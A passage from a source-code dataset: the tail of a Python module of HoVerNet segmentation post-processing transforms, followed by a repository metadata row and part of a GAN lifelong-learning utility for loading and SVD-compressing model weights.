raise ValueError(f"The mask should have the shape of [1, H, W] or [H, W], but got {mask.shape}.")
if instance_border.shape[0] != 1 or instance_border.ndim != 3:
raise ValueError(f"Input instance_border should be with size of [1, H, W], but got {instance_border.shape}")
distance_map = (1.0 - instance_border) * mask
distance_map = self.smooth_fn(distance_map) # type: ignore
return convert_to_dst_type(-distance_map, mask, dtype=self.dtype)[0]
class GenerateWatershedMarkers(Transform):
"""
Generate markers to be used in `watershed`. The watershed algorithm treats pixels values as a local topography
(elevation). The algorithm floods basins from the markers until basins attributed to different markers meet on
watershed lines. Generally, markers are chosen as local minima of the image, from which basins are flooded.
Here is the implementation from HoVerNet paper.
For more details refer to papers: https://arxiv.org/abs/1812.06499.
Args:
threshold: a float value to threshold to binarize instance border map.
It turns uncertain area to 1 and other area to 0. Defaults to 0.4.
radius: the radius of the disk-shaped footprint used in `opening`. Defaults to 2.
min_object_size: objects smaller than this size (in pixel) are removed. Defaults to 10.
postprocess_fn: additional post-process function on the markers.
If not provided, :py:class:`monai.transforms.post.FillHoles()` will be used.
dtype: target data type to convert to. Defaults to np.int64.
"""
backend = [TransformBackends.NUMPY]
def __init__(
self,
threshold: float = 0.4,
radius: int = 2,
min_object_size: int = 10,
postprocess_fn: Callable | None = None,
dtype: DtypeLike = np.int64,
) -> None:
self.threshold = threshold
self.radius = radius
self.dtype = dtype
if postprocess_fn is None:
postprocess_fn = FillHoles()
self.postprocess_fn = postprocess_fn
self.remove_small_objects = RemoveSmallObjects(min_size=min_object_size) if min_object_size > 0 else None
def __call__(self, mask: NdarrayOrTensor, instance_border: NdarrayOrTensor) -> NdarrayOrTensor: # type: ignore
"""
Args:
mask: binary segmentation map, the output of :py:class:`GenerateWatershedMask`.
Shape must be [1, H, W] or [H, W].
instance_border: instance border map, the output of :py:class:`GenerateInstanceBorder`.
Shape must be [1, H, W].
"""
if len(mask.shape) == 3:
if mask.shape[0] != 1:
raise ValueError(f"The mask should have only one channel, but got {mask.shape[0]}.")
elif len(mask.shape) == 2:
mask = mask[None]
else:
raise ValueError(f"The mask should have the shape of [1, H, W] or [H, W], but got {mask.shape}.")
if instance_border.shape[0] != 1 or instance_border.ndim != 3:
raise ValueError(f"Input instance_border should be with size of [1, H, W], but got {instance_border.shape}")
instance_border = instance_border >= self.threshold # uncertain area
marker = mask - convert_to_dst_type(instance_border, mask)[0] # certain foreground
marker[marker < 0] = 0 # type: ignore
marker = self.postprocess_fn(marker)
marker = convert_to_numpy(marker)
marker = opening(marker.squeeze(), disk(self.radius))
marker = label(marker)[0][None]
if self.remove_small_objects is not None:
marker = self.remove_small_objects(marker)
return convert_to_dst_type(marker, mask, dtype=self.dtype)[0]
class GenerateSuccinctContour(Transform):
"""
Converts SciPy-style contours (generated by skimage.measure.find_contours) to a more succinct version which only includes
the pixels to which lines need to be drawn (i.e. not the intervening pixels along each line).
Args:
height: height of bounding box, used to detect direction of line segment.
width: width of bounding box, used to detect direction of line segment.
Returns:
the pixels that need to be joined by straight lines to describe the outmost pixels of the foreground similar to
OpenCV's cv.CHAIN_APPROX_SIMPLE (counterclockwise)
"""
def __init__(self, height: int, width: int) -> None:
self.height = height
self.width = width
def _generate_contour_coord(self, current: np.ndarray, previous: np.ndarray) -> tuple[int, int]:
"""
Generate contour coordinates. Given the previous and current coordinates of border positions,
returns the int pixel that marks the extremity of the segmented pixels.
Args:
current: coordinates of the current border position.
previous: coordinates of the previous border position.
"""
p_delta = (current[0] - previous[0], current[1] - previous[1])
if p_delta in ((0.0, 1.0), (0.5, 0.5), (1.0, 0.0)):
row = int(current[0] + 0.5)
col = int(current[1])
elif p_delta in ((0.0, -1.0), (0.5, -0.5)):
row = int(current[0])
col = int(current[1])
elif p_delta in ((-1, 0.0), (-0.5, -0.5)):
row = int(current[0])
col = int(current[1] + 0.5)
elif p_delta == (-0.5, 0.5):
row = int(current[0] + 0.5)
col = int(current[1] + 0.5)
return row, col
def _calculate_distance_from_top_left(self, sequence: Sequence[tuple[int, int]]) -> int:
"""
Each sequence of coordinates describes a boundary between foreground and background starting and ending at two sides
of the bounding box. To order the sequences correctly, we compute the distance from the top-left of the bounding box
around the perimeter in a clockwise direction.
Args:
sequence: list of border points coordinates.
Returns:
the distance round the perimeter of the bounding box from the top-left origin
"""
distance: int
first_coord = sequence[0]
if first_coord[0] == 0:
distance = first_coord[1]
elif first_coord[1] == self.width - 1:
distance = self.width + first_coord[0]
elif first_coord[0] == self.height - 1:
distance = 2 * self.width + self.height - first_coord[1]
else:
distance = 2 * (self.width + self.height) - first_coord[0]
return distance
def __call__(self, contours: list[np.ndarray]) -> np.ndarray:
"""
Args:
contours: list of (n, 2)-ndarrays, scipy-style clockwise line segments, with lines separating foreground/background.
Each contour is an ndarray of shape (n, 2), consisting of n (row, column) coordinates along the contour.
"""
pixels: list[tuple[int, int]] = []
sequences = []
corners = [False, False, False, False]
for group in contours:
sequence: list[tuple[int, int]] = []
last_added = None
prev = None
corner = -1
for i, coord in enumerate(group):
if i == 0:
# originating from the top, so must be heading south east
if coord[0] == 0.0:
corner = 1
pixel = (0, int(coord[1] - 0.5))
if pixel[1] == self.width - 1:
corners[1] = True
elif pixel[1] == 0.0:
corners[0] = True
# originating from the left, so must be heading north east
elif coord[1] == 0.0:
corner = 0
pixel = (int(coord[0] + 0.5), 0)
# originating from the bottom, so must be heading north west
elif coord[0] == self.height - 1:
corner = 3
pixel = (int(coord[0]), int(coord[1] + 0.5))
if pixel[1] == self.width - 1:
corners[2] = True
# originating from the right, so must be heading south west
elif coord[1] == self.width - 1:
corner = 2
pixel = (int(coord[0] - 0.5), int(coord[1]))
else:
warnings.warn(f"Invalid contour coord {coord} is generated, skip this instance.")
return None # type: ignore
sequence.append(pixel)
last_added = pixel
elif i == len(group) - 1:
# add this point
pixel = self._generate_contour_coord(coord, prev) # type: ignore
if pixel != last_added:
sequence.append(pixel)
last_added = pixel
elif np.any(coord - prev != group[i + 1] - coord):
pixel = self._generate_contour_coord(coord, prev) # type: ignore
if pixel != last_added:
sequence.append(pixel)
last_added = pixel
# flag whether each corner has been crossed
if i == len(group) - 1:
if corner == 0:
if coord[0] == 0:
corners[corner] = True
elif corner == 1:
if coord[1] == self.width - 1:
corners[corner] = True
elif corner == 2:
if coord[0] == self.height - 1:
corners[corner] = True
elif corner == 3:
if coord[1] == 0.0:
corners[corner] = True
prev = coord
dist = self._calculate_distance_from_top_left(sequence)
sequences.append({"distance": dist, "sequence": sequence})
# check whether we need to insert any missing corners
if corners[0] is False:
sequences.append({"distance": 0, "sequence": [(0, 0)]})
if corners[1] is False:
sequences.append({"distance": self.width, "sequence": [(0, self.width - 1)]})
if corners[2] is False:
sequences.append({"distance": self.width + self.height, "sequence": [(self.height - 1, self.width - 1)]})
if corners[3] is False:
sequences.append({"distance": 2 * self.width + self.height, "sequence": [(self.height - 1, 0)]})
# join the sequences into a single contour
# starting at top left and rotating clockwise
sequences.sort(key=lambda x: x.get("distance")) # type: ignore
last = (-1, -1)
for _sequence in sequences:
if _sequence["sequence"][0] == last: # type: ignore
pixels.pop()
if pixels:
pixels = [*pixels, *_sequence["sequence"]] # type: ignore
else:
pixels = _sequence["sequence"] # type: ignore
last = pixels[-1]
if pixels[0] == last:
pixels.pop(0)
if pixels[0] == (0, 0):
pixels.append(pixels.pop(0))
return np.flip(convert_to_numpy(pixels, dtype=np.int32)) # type: ignore
class GenerateInstanceContour(Transform):
"""
Generate contour for each instance in a 2D array. Use `GenerateSuccinctContour` to only include
the pixels to which lines need to be drawn
Args:
min_num_points: assumed that the created contour does not form a contour if it does not contain more points
than the specified value. Defaults to 3.
contour_level: an optional value for `skimage.measure.find_contours` to find contours in the array.
If not provided, the level is set to `(max(image) + min(image)) / 2`.
"""
backend = [TransformBackends.NUMPY]
def __init__(self, min_num_points: int = 3, contour_level: float | None = None) -> None:
self.contour_level = contour_level
self.min_num_points = min_num_points
def __call__(self, inst_mask: NdarrayOrTensor, offset: Sequence[int] | None = (0, 0)) -> np.ndarray | None:
"""
Args:
inst_mask: segmentation mask for a single instance. Shape should be [1, H, W, [D]]
offset: optional offset of starting position of the instance mask in the original array. Default to 0 for each dim.
"""
inst_mask = inst_mask.squeeze() # squeeze channel dim
inst_mask = convert_to_numpy(inst_mask)
inst_contour_cv = find_contours(inst_mask, level=self.contour_level)
generate_contour = GenerateSuccinctContour(inst_mask.shape[0], inst_mask.shape[1])
inst_contour = generate_contour(inst_contour_cv)
if inst_contour is None:
return None
# less than `self.min_num_points` points don't make a contour, so skip.
# They are likely to be artifacts as the contours obtained via approximation.
if inst_contour.shape[0] < self.min_num_points:
print(f"< {self.min_num_points} points don't make a contour, so skipped!")
return None
# check for tricky shape
elif len(inst_contour.shape) != 2:
print(f"{len(inst_contour.shape)} != 2, check for tricky shapes!")
return None
else:
inst_contour[:, 0] += offset[0] # type: ignore
inst_contour[:, 1] += offset[1] # type: ignore
return inst_contour
class GenerateInstanceCentroid(Transform):
"""
Generate instance centroid using `skimage.measure.centroid`.
Args:
dtype: the data type of output centroid.
"""
backend = [TransformBackends.NUMPY]
def __init__(self, dtype: DtypeLike | None = int) -> None:
self.dtype = dtype
def __call__(self, inst_mask: NdarrayOrTensor, offset: Sequence[int] | int = 0) -> NdarrayOrTensor:
"""
Args:
inst_mask: segmentation mask for a single instance. Shape should be [1, H, W, [D]]
offset: optional offset of starting position of the instance mask in the original array. Default to 0 for each dim.
"""
inst_mask = convert_to_numpy(inst_mask)
inst_mask = inst_mask.squeeze(0) # squeeze channel dim
ndim = len(inst_mask.shape)
offset = ensure_tuple_rep(offset, ndim)
inst_centroid = centroid(inst_mask)
for i in range(ndim):
inst_centroid[i] += offset[i]
return convert_to_dst_type(inst_centroid, inst_mask, dtype=self.dtype)[0]
class GenerateInstanceType(Transform):
"""
Generate instance type and probability for each instance.
"""
backend = [TransformBackends.NUMPY]
def __call__( # type: ignore
self, type_pred: NdarrayOrTensor, seg_pred: NdarrayOrTensor, bbox: np.ndarray, instance_id: int
) -> tuple[int, float]:
"""
Args:
type_pred: pixel-level type prediction map after activation function.
seg_pred: pixel-level segmentation prediction map after activation function.
bbox: bounding box coordinates of the instance, shape is [channel, 2 * spatial dims].
instance_id: get instance type from specified instance id.
"""
rmin, rmax, cmin, cmax = bbox.flatten()
seg_map_crop = seg_pred[0, rmin:rmax, cmin:cmax]
type_map_crop = type_pred[0, rmin:rmax, cmin:cmax]
seg_map_crop = convert_to_dst_type(seg_map_crop == instance_id, type_map_crop, dtype=bool)[0]
inst_type = type_map_crop[seg_map_crop] # type: ignore
type_list, type_pixels = unique(inst_type, return_counts=True)
type_list = list(zip(type_list, type_pixels))
type_list = sorted(type_list, key=lambda x: x[1], reverse=True) # type: ignore
inst_type = type_list[0][0]
if inst_type == 0: # ! pick the 2nd most dominant if exist
if len(type_list) > 1:
inst_type = type_list[1][0]
type_dict = {v[0]: v[1] for v in type_list}
type_prob = type_dict[inst_type] / (sum(seg_map_crop) + 1.0e-6)
return (int(inst_type), float(type_prob))
class HoVerNetInstanceMapPostProcessing(Transform):
"""
The post-processing transform for HoVerNet model to generate instance segmentation map.
It generates an instance segmentation map as well as a dictionary containing centroids, bounding boxes, and contours
for each instance.
Args:
activation: the activation layer to be applied on the input probability map.
It can be "softmax" or "sigmoid" string, or any callable. Defaults to "softmax".
mask_threshold: a float value to threshold to binarize probability map to generate mask.
min_object_size: objects smaller than this size (in pixel) are removed. Defaults to 10.
sobel_kernel_size: the size of the Sobel kernel used in :py:class:`GenerateInstanceBorder`. Defaults to 5.
distance_smooth_fn: smoothing function for distance map.
If not provided, :py:class:`monai.transforms.intensity.GaussianSmooth()` will be used.
marker_threshold: a float value to threshold to binarize instance border map for markers.
It turns uncertain area to 1 and other area to 0. Defaults to 0.4.
marker_radius: the radius of the disk-shaped footprint used in `opening` of markers. Defaults to 2.
marker_postprocess_fn: post-process function for watershed markers.
If not provided, :py:class:`monai.transforms.post.FillHoles()` will be used.
watershed_connectivity: `connectivity` argument of `skimage.segmentation.watershed`.
min_num_points: minimum number of points to be considered as a contour. Defaults to 3.
contour_level: an optional value for `skimage.measure.find_contours` to find contours in the array.
If not provided, the level is set to `(max(image) + min(image)) / 2`.
"""
def __init__(
self,
activation: str | Callable = "softmax",
mask_threshold: float | None = None,
min_object_size: int = 10,
sobel_kernel_size: int = 5,
distance_smooth_fn: Callable | None = None,
marker_threshold: float = 0.4,
marker_radius: int = 2,
marker_postprocess_fn: Callable | None = None,
watershed_connectivity: int | None = 1,
min_num_points: int = 3,
contour_level: float | None = None,
) -> None:
super().__init__()
self.generate_watershed_mask = GenerateWatershedMask(
activation=activation, threshold=mask_threshold, min_object_size=min_object_size
)
self.generate_instance_border = GenerateInstanceBorder(kernel_size=sobel_kernel_size)
self.generate_distance_map = GenerateDistanceMap(smooth_fn=distance_smooth_fn)
self.generate_watershed_markers = GenerateWatershedMarkers(
threshold=marker_threshold,
radius=marker_radius,
postprocess_fn=marker_postprocess_fn,
min_object_size=min_object_size,
)
self.watershed = Watershed(connectivity=watershed_connectivity)
self.generate_instance_contour = GenerateInstanceContour(
min_num_points=min_num_points, contour_level=contour_level
)
self.generate_instance_centroid = GenerateInstanceCentroid()
def __call__( # type: ignore
self, nuclear_prediction: NdarrayOrTensor, hover_map: NdarrayOrTensor
) -> tuple[dict, NdarrayOrTensor]:
"""post-process instance segmentation branches (NP and HV) to generate instance segmentation map.
Args:
nuclear_prediction: the output of NP (nuclear prediction) branch of HoVerNet model
hover_map: the output of HV (hover map) branch of HoVerNet model
"""
# Process NP and HV branch using watershed algorithm
watershed_mask = self.generate_watershed_mask(nuclear_prediction)
instance_borders = self.generate_instance_border(watershed_mask, hover_map)
distance_map = self.generate_distance_map(watershed_mask, instance_borders)
watershed_markers = self.generate_watershed_markers(watershed_mask, instance_borders)
instance_map = self.watershed(distance_map, watershed_mask, watershed_markers)
# Create bounding boxes, contours and centroids
instance_ids = set(np.unique(instance_map)) - {0} # exclude background
instance_info = {}
for inst_id in instance_ids:
instance_mask = instance_map == inst_id
instance_bbox = BoundingRect()(instance_mask)
instance_mask = instance_mask[
:, instance_bbox[0][0] : instance_bbox[0][1], instance_bbox[0][2] : instance_bbox[0][3]
]
offset = [instance_bbox[0][2], instance_bbox[0][0]]
instance_contour = self.generate_instance_contour(FillHoles()(instance_mask), offset)
if instance_contour is not None:
instance_centroid = self.generate_instance_centroid(instance_mask, offset)
instance_info[inst_id] = {
"bounding_box": instance_bbox,
"centroid": instance_centroid,
"contour": instance_contour,
}
return instance_info, instance_map
class HoVerNetNuclearTypePostProcessing(Transform):
"""
The post-processing transform for HoVerNet model to generate nuclear type information.
It updates the input instance info dictionary with information about types of the nuclei (value and probability).
Also if requested (`return_type_map=True`), it generates a pixel-level type map.
Args:
activation: the activation layer to be applied on nuclear type branch. It can be "softmax" or "sigmoid" string,
or any callable. Defaults to "softmax".
threshold: an optional float value to threshold to binarize probability map.
If not provided, defaults to 0.5 when activation is not "softmax", otherwise None.
return_type_map: whether to calculate and return pixel-level type map.
"""
def __init__(
self, activation: str | Callable = "softmax", threshold: float | None = None, return_type_map: bool = True
) -> None:
super().__init__()
self.return_type_map = return_type_map
self.generate_instance_type = GenerateInstanceType()
# set activation layer
use_softmax = False
use_sigmoid = False
activation_fn = None
if isinstance(activation, str):
if activation.lower() == "softmax":
use_softmax = True
elif activation.lower() == "sigmoid":
use_sigmoid = True
else:
raise ValueError(
f"The activation should be 'softmax' or 'sigmoid' string, or any callable. '{activation}' was given."
)
elif callable(activation):
activation_fn = activation
else:
raise ValueError(f"The activation type should be either str or callable. '{type(activation)}' was given.")
self.activation = Activations(softmax=use_softmax, sigmoid=use_sigmoid, other=activation_fn)
# set discretization transform
if not use_softmax and threshold is None:
threshold = 0.5
self.as_discrete = AsDiscrete(threshold=threshold, argmax=use_softmax)
def __call__( # type: ignore
self, type_prediction: NdarrayOrTensor, instance_info: dict[int, dict], instance_map: NdarrayOrTensor
) -> tuple[dict, NdarrayOrTensor | None]:
"""Process NC (type prediction) branch and combine it with instance segmentation
It updates the instance_info with instance type and associated probability, and generate instance type map.
Args:
instance_info: instance information dictionary, the output of :py:class:`HoVerNetInstanceMapPostProcessing`
instance_map: instance segmentation map, the output of :py:class:`HoVerNetInstanceMapPostProcessing`
type_prediction: the output of NC (type prediction) branch of HoVerNet model
"""
type_prediction = self.activation(type_prediction)
type_prediction = self.as_discrete(type_prediction)
type_map = None
if self.return_type_map:
type_map = convert_to_dst_type(torch.zeros(instance_map.shape), instance_map)[0]
for inst_id in instance_info:
instance_type, instance_type_prob = self.generate_instance_type(
type_pred=type_prediction,
seg_pred=instance_map,
bbox=instance_info[inst_id]["bounding_box"],
instance_id=inst_id,
)
# update instance info dict with type data
instance_info[inst_id]["type_prob"] = instance_type_prob
instance_info[inst_id]["type"] = instance_type
# update instance type map
if type_map is not None:
type_map[instance_map == inst_id] = instance_type
return instance_info, type_map
| [
"[email protected]"
]
| |
edd312326d4c73266143456b10802aafd47f2de2 | 637962e1420d3b86005d0e916bafb5578f1537b2 | /gan_training/utils_model_load.py | f32d21c2352efaa1afbea5a78302dfa898252ab1 | []
| no_license | TrendingTechnology/GANmemory_LifelongLearning | aae31ec1f8830232f4c336e559a481a54cf8fe7b | 264f67c0350271e31335f2fd8fd8b8811045322d | refs/heads/main | 2023-03-03T08:25:06.175794 | 2021-02-10T08:29:48 | 2021-02-10T08:29:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,896 | py |
import torch
import torch.utils.data
import torch.utils.data.distributed
import torchvision
import torchvision.transforms as transforms
from collections import OrderedDict
def get_parameter_number(net):
total_num = sum(p.numel() for p in net.parameters())
trainable_num = sum(p.numel() for p in net.parameters() if p.requires_grad)
print('Total=', total_num, 'Trainable=', trainable_num, 'fixed=', total_num-trainable_num)
def load_part_model(m_fix, m_ini):
dict_fix = m_fix.state_dic()
dict_ini = m_ini.state_dic()
dict_fix = {k: v for k, v in dict_fix.items() if k in dict_ini and k.find('embedding')==-1 and k.find('fc') == -1}
dict_ini.update(dict_fix)
m_ini.load_state_dict(dict_ini)
return m_ini
def model_equal_all(model, dict):
model_dict = model.state_dict()
model_dict.update(dict)
model.load_state_dict(model_dict)
return model
def change_model_name(model, pretrained_net_dict):
# pretrained_net_dict = dict
new_state_dict = OrderedDict()
for k, v in pretrained_net_dict.items():
if k.find('AdaFM') >= 0 and k.find('style_gama') >= 0:
indd = k.find('style_gama')
name = k[:indd]+'gamma'
new_state_dict[name] = v.squeeze()
elif k.find('AdaFM') >= 0 and k.find('style_beta') >= 0:
indd = k.find('style_beta')
name = k[:indd]+'beta'
new_state_dict[name] = v.squeeze()
else:
new_state_dict[k] = v
# load params
model.load_state_dict(new_state_dict)
return model
def save_adafm_only(model, is_G=True):
new_state_dict = OrderedDict()
model_dict = model.state_dict()
for k, v in model_dict.items():
if k.find('AdaFM') >= 0:
name = k
new_state_dict[name] = v
if is_G==False:
if k.find('fc') >= 0:
name = k
new_state_dict[name] = v
return new_state_dict
def model_equal_part(model, dict_all):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if k in model_dict and k.find('embedding') == -1 and k.find('fc') == -1}
model_dict.update(dict_fix)
model.load_state_dict(model_dict)
return model
def model_equal_part_embed(model, dict_all):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if k in model_dict and k.find('embedding') == -1}
model_dict.update(dict_fix)
model.load_state_dict(model_dict)
return model
def model_equal_embeding(model, dict_all):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if k in model_dict and k.find('embedding') == -1 and k.find('fc') == -1}
model_dict.update(dict_fix)
for k, v in dict_all.items():
if k.find('fc') >= 0 and k.find('weight') >=0:
name = k
model_dict[name][:,:257] = v
model.load_state_dict(model_dict)
return model
def model_load_interplation(generator, dict_G_1, dict_G_2, lamdd=0.0, block=None):
model_dict = generator.state_dict()
for k, v in dict_G_1.items():
if block == 9:
model_dict[k] = (1-lamdd)*dict_G_1[k] + lamdd*dict_G_2[k]
elif block==0:
if k.find('resnet_0_0')>=0:
model_dict[k] = (1-lamdd)*dict_G_1[k] + lamdd*dict_G_2[k]
else:
model_dict[k] = dict_G_1[k]
elif block==1:
if k.find('resnet_1_0')>=0:
model_dict[k] = (1-lamdd)*dict_G_1[k] + lamdd*dict_G_2[k]
else:
model_dict[k] = dict_G_1[k]
elif block==2:
if k.find('resnet_2_0')>=0:
model_dict[k] = (1-lamdd)*dict_G_1[k] + lamdd*dict_G_2[k]
else:
model_dict[k] = dict_G_1[k]
elif block==3:
if k.find('resnet_3_0')>=0:
model_dict[k] = (1-lamdd)*dict_G_1[k] + lamdd*dict_G_2[k]
else:
model_dict[k] = dict_G_1[k]
elif block==4:
if k.find('resnet_4_0')>=0:
model_dict[k] = (1-lamdd)*dict_G_1[k] + lamdd*dict_G_2[k]
else:
model_dict[k] = dict_G_1[k]
elif block==5:
if k.find('resnet_5_0')>=0:
model_dict[k] = (1-lamdd)*dict_G_1[k] + lamdd*dict_G_2[k]
else:
model_dict[k] = dict_G_1[k]
elif block==6:
if k.find('resnet_6_0')>=0:
model_dict[k] = (1-lamdd)*dict_G_1[k] + lamdd*dict_G_2[k]
else:
model_dict[k] = dict_G_1[k]
generator.load_state_dict(model_dict)
return generator
def model_load_choose_para(generator, dict_G_1, para=None):
model_dict = generator.state_dict()
for k, v in dict_G_1.items():
if para == None:
model_dict[k] = dict_G_1[k]
elif para==0:
if k.find('style_gama')>=0 or (k.find('AdaFM_fc.gamma')>=0):
model_dict[k] = dict_G_1[k]
print(k)
elif para==1:
if k.find('style_beta')>=0 or (k.find('AdaFM_fc.beta')>=0):
model_dict[k] = dict_G_1[k]
print(k)
elif para==2:
if k.find('AdaFM_b')>=0 or k.find('AdaFM_fc_b')>=0:
model_dict[k] = dict_G_1[k]
print(k)
generator.load_state_dict(model_dict)
return generator
def model_load_choose_layer(generator, dict_G_1, Layerr=None):
model_dict = generator.state_dict()
for k, v in dict_G_1.items():
if Layerr == None:
model_dict[k] = dict_G_1[k]
else:
if k.find(Layerr) >= 0 and (k.find('AdaFM') >= 0):
model_dict[k] = dict_G_1[k]
print(k)
generator.load_state_dict(model_dict)
return generator
def model_load_donot_choose_para(generator, dict_G_1, para=None):
model_dict = generator.state_dict()
for k, v in dict_G_1.items():
if para == None:
model_dict[k] = dict_G_1[k]
elif para==0:
if k.find('style_gama')==-1 and k.find('AdaFM_fc.gamma')==-1:
model_dict[k] = dict_G_1[k]
elif para==1:
if k.find('style_beta')==-1 and k.find('AdaFM_fc.beta')==-1:
model_dict[k] = dict_G_1[k]
elif para==2:
if k.find('AdaFM_b')==-1 and k.find('AdaFM_fc_b')==-1:
model_dict[k] = dict_G_1[k]
generator.load_state_dict(model_dict)
return generator
def out_bias_to_in_bias(model, dict_all):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if
k in model_dict and k.find('AdaFM_fc_b') == -1 and k.find('AdaFM_b0') == -1 and k.find('AdaFM_b1') == -1}
for k, v in dict_all.items():
ind = k.find('AdaFM_fc_b')
if ind >= 0:
dict_fix[k[:ind] + 'AdaFM_fc.b'] = v
ind = k.find('AdaFM_b0')
if ind >= 0:
dict_fix[k[:ind] + 'AdaFM_0.b'] = v
ind = k.find('AdaFM_b1')
if ind >= 0:
dict_fix[k[:ind] + 'AdaFM_1.b'] = v
model_dict.update(dict_fix)
model.load_state_dict(model_dict)
return model
def model_equal_classCondition(model, dict_all):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if k in model_dict and k.find('embedding') == -1 and k.find('fc') == -1}
model_dict.update(dict_fix)
for k, v in dict_all.items():
if k.find('fc') >= 0 and k.find('weight') >=0:
name = k
model_dict[name] = v * 0.0
model_dict[name][:,:257] = v
model.load_state_dict(model_dict)
return model
def model_equal_CelebA(model, dict_all, dim_z=-1, dim_h=-1):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if
k in model_dict and k.find('embedding') == -1}
for k, v in dict_all.items():
if k.find('fc') >=0 and k.find('weight') >=0:
if dim_z >= 0 and dim_h >= 0:
dict_fix[k] = v[:dim_h, :dim_z]
elif dim_z >= 0:
dict_fix[k] = v[:, :dim_z]
if dim_h >= 0:
if k.find('fc') >=0 and k.find('bias') >=0:
dict_fix[k] = v[:dim_h]
model_dict.update(dict_fix)
model.load_state_dict(model_dict)
return model
def model_equal_SVD(model, dict_all, FRAC=0.9):
model_dict = model.state_dict()
# FRAC = 0.9
for k, v in dict_all.items():
if k.find('AdaFM') >= 0 and k.find('style_gama') >= 0:
# print('shape of FC:', v.shape)
Ua, Sa, Va = (v-1.).squeeze().svd()
if Ua.shape[0] >= 512:
FRAC = 0.6
else:
FRAC = 0.9
ii, jj = Sa.abs().sort(descending=True)
ii_acsum = ii.cumsum(dim=0)
NUM = (1 - (ii_acsum / ii_acsum[-1] >= FRAC)).sum() + 1
v_new = 1. + (Ua[:, :NUM] * Sa[:NUM].unsqueeze(0)).mm(Va[:, :NUM].t())
dict_all[k] = v_new.unsqueeze(2).unsqueeze(3)
elif k.find('AdaFM') >= 0 and k.find('style_beta') >= 0:
Ua, Sa, Va = v.squeeze().svd()
if Ua.shape[0] >= 512:
FRAC = 0.6
else:
FRAC = 0.9
ii, jj = Sa.abs().sort(descending=True)
ii_acsum = ii.cumsum(dim=0)
NUM = (1 - (ii_acsum / ii_acsum[-1] >= FRAC)).sum() + 1
v_new = (Ua[:, :NUM] * Sa[:NUM].unsqueeze(0)).mm(Va[:, :NUM].t())
dict_all[k] = v_new.unsqueeze(2).unsqueeze(3)
model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
def model_equal_SVD_v2(model, dict_all, task_id=-1, NUM=200, dim_z=-1):
model_dict = model.state_dict()
dict_fix = {k: v for k, v in dict_all.items() if
k in model_dict and k.find('AdaFM_0') == -1 and k.find('AdaFM_1') == -1}
if dim_z >= 0:
for k, v in dict_all.items():
if k.find('fc') >= 0 and k.find('weight') >= 0:
# print('shape of FC:', v.shape)
dict_fix[k] = v[:, :dim_z]
model_dict.update(dict_fix)
pecen = 1./2.
genh, S_rep = 2., 'abs'
# genh, S_rep = 2., 'exp'
for k, v in dict_all.items():
ind = k.find('AdaFM_0')
if ind >= 0 and k.find('style_gama') >= 0:
# print('shape of FC:', v.shape)
Ua, Sa, Va = v.squeeze().svd()
model_dict[k[:ind + 7] + '.gamma_u'] = Ua[:, :NUM]
model_dict[k[:ind + 7] + '.gamma_v'] = Va[:, :NUM]
if task_id >= 1:
if S_rep == 'abs':
model_dict[k[:ind + 7] + '.gamma_s2'] = Sa[:NUM] * pecen
elif S_rep == 'x2':
model_dict[k[:ind + 7] + '.gamma_s2'] = (Sa[:NUM] * pecen).pow(1. / genh)
elif S_rep == 'exp':
model_dict[k[:ind + 7] + '.gamma_s2'] = (Sa[:NUM] * pecen).log()
else:
model_dict[k[:ind + 7] + '.gamma_s2'] = Sa[:NUM]
elif ind >= 0 and k.find('style_beta') >= 0:
# print('shape of FC:', v.shape)
Ua, Sa, Va = v.squeeze().svd()
model_dict[k[:ind + 7] + '.beta_u'] = Ua[:, :NUM]
model_dict[k[:ind + 7] + '.beta_v'] = Va[:, :NUM]
if task_id >= 1:
if S_rep == 'abs':
model_dict[k[:ind + 7] + '.beta_s2'] = Sa[:NUM] * pecen
elif S_rep == 'x2':
model_dict[k[:ind + 7] + '.beta_s2'] = (Sa[:NUM] * pecen).pow(1. / genh)
elif S_rep == 'exp':
model_dict[k[:ind + 7] + '.beta_s2'] = (Sa[:NUM] * pecen).log()
else:
model_dict[k[:ind + 7] + '.beta_s2'] = Sa[:NUM]
ind = k.find('AdaFM_1')
if ind >= 0 and k.find('style_gama') >= 0:
# print('shape of FC:', v.shape)
Ua, Sa, Va = v.squeeze().svd()
model_dict[k[:ind + 7] + '.gamma_u'] = Ua[:, :NUM]
model_dict[k[:ind + 7] + '.gamma_v'] = Va[:, :NUM]
if task_id >= 1:
if S_rep == 'abs':
model_dict[k[:ind + 7] + '.gamma_s2'] = Sa[:NUM] * pecen
elif S_rep == 'x2':
model_dict[k[:ind + 7] + '.gamma_s2'] = (Sa[:NUM] * pecen).pow(1. / genh)
elif S_rep == 'exp':
model_dict[k[:ind + 7] + '.gamma_s2'] = (Sa[:NUM] * pecen).log()
else:
model_dict[k[:ind + 7] + '.gamma_s2'] = Sa[:NUM]
elif ind >= 0 and k.find('style_beta') >= 0:
# print('shape of FC:', v.shape)
Ua, Sa, Va = v.squeeze().svd()
model_dict[k[:ind + 7] + '.beta_u'] = Ua[:, :NUM]
model_dict[k[:ind + 7] + '.beta_v'] = Va[:, :NUM]
if task_id >= 1:
if S_rep == 'abs':
model_dict[k[:ind + 7] + '.beta_s2'] = Sa[:NUM] * pecen
elif S_rep == 'x2':
model_dict[k[:ind + 7] + '.beta_s2'] = (Sa[:NUM] * pecen).pow(1. / genh)
elif S_rep == 'exp':
model_dict[k[:ind + 7] + '.beta_s2'] = (Sa[:NUM] * pecen).log()
else:
model_dict[k[:ind + 7] + '.beta_s2'] = Sa[:NUM]
model.load_state_dict(model_dict)
return model
def model_equal_SVD_fenkai(model, dict_all, NUM1=100, NUM2=50):
model_dict = model.state_dict()
for k, v in dict_all.items():
if k.find('AdaFM') >= 0 and k.find('style_gama') >= 0:
Ua, Sa, Va = v.squeeze().svd()
print('shape of FC:', NUM1)
v_new = torch.mm(torch.mm(Ua[:, :NUM1], torch.diag(Sa[:NUM1])), Va[:, :NUM1].t())
dict_all[k] = v_new.unsqueeze(2).unsqueeze(3)
if k.find('AdaFM') >= 0 and k.find('style_beta') >= 0:
Ua, Sa, Va = v.squeeze().svd()
